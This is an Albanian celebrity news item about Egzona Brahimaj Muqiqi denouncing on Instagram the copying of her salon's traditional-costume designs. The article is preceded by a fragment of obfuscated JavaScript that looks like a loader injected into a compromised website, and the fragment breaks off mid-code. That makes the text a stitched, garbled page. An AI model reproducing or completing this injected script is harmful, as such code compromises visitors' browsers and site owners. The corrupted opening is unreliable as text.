;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Egzona vendos të flasë: Denoncon publikisht vjedhjen!

By

Ajo e kishte nisur me një biznes që po i shkonte suksesshëm. Ka një sallon ondulomi ku punon vetulla dhe siç thotë ajo përmes publikimeve në rrjetet sociale, “i bën të lumtura gratë.

Egzona Brahimaj Muqiqi, bashkëshortja e këngëtarit Albatrit Muqiqi, tash ka edhe një tjetër biznes: atë të punimit të dallamave tradicionale.

Por me këtë të fundit i ka dalë pak punë. Punimet e ekipit të saj janë pëlqyer aq shumë nga dikush, sa ka vendosur ta kopjojë “kryekëput”.

Një gjë e tillë e ka nervozuar Egzonën e cila ka vendosur që të reagojë përmes Instagramit, duke e denoncuar si vjedhje një punim që po e cilëson si autentik të sallonit Goddess.

“Stop me vjedhje të punimeve tona nga salloni Goddess”, ka shkruar Egzona, duke shprehur tone nervozizmi në mes rreshtash.

Pavarësisht se dikush mund ta ketë nervozuar pak, asgjë s’mund ta prishë lumturinë e saj në prag të lindjes së vajzës së parë. /Prive.al/

Artikuj të ngjashëm